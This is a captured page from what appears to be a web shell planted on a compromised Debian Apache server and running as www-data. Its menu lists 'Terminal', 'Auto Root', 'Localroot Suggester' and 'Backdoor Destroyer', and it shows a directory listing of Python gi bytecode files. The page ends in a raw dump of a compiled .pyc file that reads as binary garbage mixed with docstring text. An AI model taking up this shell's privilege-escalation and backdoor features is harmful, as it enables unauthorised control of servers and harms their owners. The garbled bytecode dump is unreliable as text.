Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
gi /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-311.pyc
6.48
KB
-rw-r--r--
2025-04-07 20:41
_constants.cpython-311.pyc
2.46
KB
-rw-r--r--
2025-04-07 20:41
_error.cpython-311.pyc
2.08
KB
-rw-r--r--
2025-04-07 20:41
_gtktemplate.cpython-311.pyc
13.32
KB
-rw-r--r--
2025-04-07 20:41
_option.cpython-311.pyc
17.25
KB
-rw-r--r--
2025-04-07 20:41
_ossighelper.cpython-311.pyc
9.65
KB
-rw-r--r--
2025-04-07 20:41
_propertyhelper.cpython-311.pyc
16.45
KB
-rw-r--r--
2025-04-07 20:41
_signalhelper.cpython-311.pyc
10.88
KB
-rw-r--r--
2025-04-07 20:41
docstring.cpython-311.pyc
7.25
KB
-rw-r--r--
2025-04-07 20:41
importer.cpython-311.pyc
5.73
KB
-rw-r--r--
2025-04-07 20:41
module.cpython-311.pyc
9.91
KB
-rw-r--r--
2025-04-07 20:41
pygtkcompat.cpython-311.pyc
727
B
-rw-r--r--
2025-04-07 20:41
types.cpython-311.pyc
14.71
KB
-rw-r--r--
2025-04-07 20:41
Save
Rename
� �� ^W$ � �V � d dl mZ G d� de� � Z G d� de� � Zd� Zd� ZdS ) � )�_gic �t � e Zd ZdZ G d� de� � Zdd�Zddej dddddfd�Z d d�Z d � Zd d �Zd� Z dS )�Signala� Object which gives a nice API for creating and binding signals. :param name: Name of signal or callable closure when used as a decorator. :type name: str or callable :param callable func: Callable closure method. :param GObject.SignalFlags flags: Flags specifying when to run closure. :param type return_type: Return type of the Signal. :param list arg_types: List of argument types specifying the signals function signature :param str doc: Documentation of signal object. :param callable accumulator: Accumulator method with the signature: func(ihint, return_accu, handler_return, accu_data) -> boolean :param object accu_data: User data passed to the accumulator. :Example: .. code-block:: python class Spam(GObject.Object): velocity = 0 @GObject.Signal def pushed(self): self.velocity += 1 @GObject.Signal(flags=GObject.SignalFlags.RUN_LAST) def pulled(self): self.velocity -= 1 stomped = GObject.Signal('stomped', arg_types=(int,)) @GObject.Signal def annotated_signal(self, a:int, b:str): "Python3 annotation support for parameter types. def on_pushed(obj): print(obj) spam = Spam() spam.pushed.connect(on_pushed) spam.pushed.emit() c �B � e Zd ZdZd� Zd� Zd� Zd� Zd� Zd� Z d� Z d � Zd S )�Signal.BoundSignalz� Temporary binding object which can be used for connecting signals without specifying the signal name string to connect. c �8 � t � | |� � S �N)�str�__new__��cls�name�args�kargss �2/usr/lib/python3/dist-packages/gi/_signalhelper.pyr zSignal.BoundSignal.__new__N s � ��;�;�s�D�)�)�)� c �V � t � | � � || _ || _ d S r )r �__init__�signal�gobj)�selfr r s r r zSignal.BoundSignal.__init__Q s&